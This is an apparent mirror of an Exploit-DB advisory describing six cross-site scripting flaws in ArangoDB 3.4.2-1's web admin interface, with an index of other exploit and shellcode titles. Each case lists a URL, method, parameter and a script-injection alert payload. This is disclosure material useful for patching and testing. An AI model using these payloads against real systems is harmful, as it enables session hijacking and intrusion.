bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/webapps/46407.txt
Offensive Security cd868436ff DB: 2019-02-19 
25 changes to exploits/shellcodes

Realterm Serial Terminal 2.0.0.70 - Denial of Service
Realterm Serial Terminal 2.0.0.70 - Local Buffer Overflow (SEH)
NBMonitor 1.6.5.0 - 'Key' Denial of Service (PoC)
Oracle Java Runtime Environment - Heap Out-of-Bounds Read During OTF Font Rendering in glyph_CloseContour
Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in OpenTypeLayoutEngine::adjustGlyphPositions
Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in ExtractBitMap_blocClass
Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in AlternateSubstitutionSubtable::process

mIRC < 7.55 - Remote Command Execution Using Argument Injection Through Custom URI Protocol Handlers
qdPM 9.1 - 'type' Cross-Site Scripting
qdPM 9.1 - 'search[keywords]' Cross-Site Scripting
Master IP CAM 01 3.3.4.2103 - Remote Command Execution
MISP 2.4.97 - SQL Command Execution via Command Injection in STIX Module
CMSsite 1.0 - 'post' SQL Injection
M/Monit 3.7.2 - Privilege Escalation
Webiness Inventory 2.3 - 'ProductModel' Arbitrary File Upload
Apache CouchDB 2.3.0 - Cross-Site Scripting
ArangoDB Community Edition 3.4.2-1 - Cross-Site Scripting
Comodo Dome Firewall 2.7.0 - Cross-Site Scripting
Zoho ManageEngine ServiceDesk Plus (SDP) < 10.0 build 10012 - Arbitrary File Upload
WordPress Plugin WooCommerce - GloBee (cryptocurrency) Payment Gateway 1.1.1 - Payment Bypass / Unauthorized Order Status Spoofing

macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (119 bytes)
macOS - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (129 bytes)
macOS - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)
macOS - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (123 bytes)
macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes)
2019-02-19 05:02:08 +00:00

124 lines
No EOL
3.6 KiB
Text
Raw Blame History

##################################################################################################################################
# Exploit Title: ArangoDB Community Edition 3.4.2-1 | Cross-Site Scripting
# Date: 17.02.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: https://www.arangodb.com
# Software Link: https://www.arangodb.com/download-major/
# Version: 3.4.2-1
##################################################################################################################################
Introduction
ArangoDB is a native multi-model, open-source database with flexible data
models for documents, graphs, and key-values. Build high performance
applications using a convenient SQL-like query language or JavaScript
extensions. Use ACID transactions if you require them. Scale horizontally
and vertically with a few mouse clicks.
#################################################################################
XSS details: DOM Based & Reflected & Stored
#################################################################################
XSS1 | DOM Based XSS - Search
URL
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#views
PAYLOAD
"><script>alert(1)</script>
<div class="search-field">
<input type="text" value=""><script>alert(1)</script>"
id="viewsSearchInput" class="search-input" placeholder="Search..."/>
<i id="viewsSearchSubmit" class="fa fa-search"></i>
</div>
#################################################################################
XSS2 | Reflected & Stored - Save as
URL
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#queries
http://127.0.0.1:8529/_db/_system/_api/user/root
METHOD
PATCH
PARAMETER
name
PAYLOAD
"><script>alert(2)</script>
#################################################################################
XSS3 | Stored - Delete query
URL
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#queries
http://127.0.0.1:8529/_db/_system/_api/user/root
METHOD
Get
#################################################################################
XSS3 | Reflected & Stored - Add User
URL
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#users
http://127.0.0.1:8529/_db/_system/_api/user
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#user/%22%3E%3Cscript%3Ealert(3)%3C%2Fscript%3E
METHOD
Post
PARAMETER
user,name
PAYLOAD
"><script>alert(3)</script>
"><script>alert(4)</script>
#################################################################################
XSS5 | DOM Based XSS - Search
URL
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#users
PAYLOAD
"><script>alert(5)</script>
<div class="search-field">
<input type="text" value=""><script>alert(5)</script>"
id="userManagementSearchInput" class="search-input"
placeholder="Search..."/>
<!-- <img id="userManagementSearchSubmit" class="search-submit-icon">
-->
<i id="userManagementSearchSubmit" class="fa fa-search"></i>
</div>
#################################################################################
XSS6 | DOM Based XSS - Search
URL
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#databases
PAYLOAD
"><script>alert(6)</script>
<div class="search-field">
<input type="text" value=""><script>alert(6)</script>"
id="databaseSearchInput" class="search-input" placeholder="Search..."/>
<!-- <img id="databaseSearchSubmit" class="search-submit-icon">-->
<i id="databaseSearchSubmit" class="fa fa-search"></i>
</div>
#################################################################################
Reference in a new issue View git blame Copy permalink